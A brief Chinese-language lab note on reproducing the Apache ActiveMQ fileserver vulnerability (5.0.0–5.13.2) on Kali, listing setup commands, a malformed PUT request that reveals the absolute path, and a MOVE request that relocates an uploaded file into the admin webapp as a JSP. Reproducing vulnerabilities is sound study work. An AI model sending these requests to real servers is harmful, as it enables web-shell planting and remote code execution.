本地用kali搭建復(fù)現(xiàn)一下
受影響的版本:Apache Group ActiveMQ 5.0.0 - 5.13.2
下載地址:http://archive.apache.org/dist/activemq/5.10.1/apache-activemq-5.10.1-bin.tar.gz
解壓:tar -xzf apache-activemq-5.10.1-bin.tar.gz
啟動(dòng):/home/apache-activemq-5.10.1/bin/linux-x86-32# ./activemq start
? ? ? ? ? ? Starting ActiveMQ Broker...

爆絕對(duì)路徑
PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
路徑:/home/apache-activemq-5.10.1/webapps/fileserver/

fileserver目錄下jsp是不被執(zhí)行了,而且是不能直接上傳jsp文件

MOVE /fileserver/test.txt HTTP/1.1
Destination:file:/home/apache-activemq-5.10.1/webapps/admin/test.jsp
